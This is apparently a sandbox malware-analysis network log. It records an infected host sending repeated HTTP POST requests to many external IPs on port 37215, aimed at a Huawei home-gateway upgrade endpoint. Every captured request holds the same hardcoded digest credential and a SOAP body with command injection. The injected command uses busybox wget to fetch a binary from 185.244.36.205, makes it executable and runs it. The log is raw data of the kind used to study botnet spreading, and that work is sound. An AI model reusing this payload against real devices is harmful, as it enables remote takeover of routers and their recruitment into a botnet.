                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1332192.168.2.153552241.102.54.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398597002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1333192.168.2.1545426102.227.163.3537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398619890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1334192.168.2.1534942186.63.30.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398619890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1335192.168.2.1537004190.70.107.9537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398657084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1336192.168.2.1534270121.232.12.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398662090 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1337192.168.2.1551956190.175.173.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398683071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1338192.168.2.1558890122.134.254.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398699999 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1339192.168.2.1539388186.201.247.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398722887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1340192.168.2.1551774102.55.126.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398775101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1341192.168.2.154258831.220.110.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398775101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
